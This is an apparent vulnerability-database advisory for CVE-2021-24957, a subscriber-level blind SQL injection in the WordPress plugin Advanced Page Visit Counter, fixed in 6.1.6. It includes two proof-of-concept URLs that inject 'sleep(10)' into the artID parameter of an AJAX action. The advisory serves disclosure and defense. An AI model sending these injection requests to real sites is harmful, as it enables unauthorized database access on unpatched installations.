WordPress Plugin Vulnerabilities

Advanced Page Visit Counter < 6.1.6 - Subscriber+ Blind SQL injection

Description

The plugin does not escape the artID parameter before using it in a SQL statement in the apvc_reset_count_art AJAX action, available to any authenticated user, leading to a SQL injection

Proof of Concept

v <= 5.0.8 - https://example.com/wp-admin/admin-ajax.php?action=apvc_reset_count_art&artID=sleep(10)

v < 6.1.6 - https://example.com/wp-admin/admin-ajax.php?action=apvc_reset_count_art&artID=sleep(10)&security_nonce=xxxx

Affects Plugins

Plugin icon
advanced-page-visit-counter
Fixed in 6.1.6

References

CVE
CVE-2021-24957

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
7.7 (high)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
a282606f-6abf-4f75-99c9-dab0bea8cc96

Timeline

Publicly Published
2022-03-29 (about 2 years ago)
Added
2022-03-29 (about 2 years ago)
Last Updated
2022-06-15 (about 1 years ago)

Other

Published
Title
Published
2024-04-22
Title
WP-Recall – Registration, Profile, Commerce & More < 16.26.6 - Unauthenticated SQL Injection
Published
2023-10-30
Title
Superb slideshow gallery < 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode
Published
2014-08-01
Title
MM Duplicate <= 1.2 - SQL Injection
Published
2021-01-28
Title
uListing < 1.7 - Unauthenticated SQL Injections
Published
2022-04-28
Title
Hermit <= 3.1.6 - Unauthenticated SQLi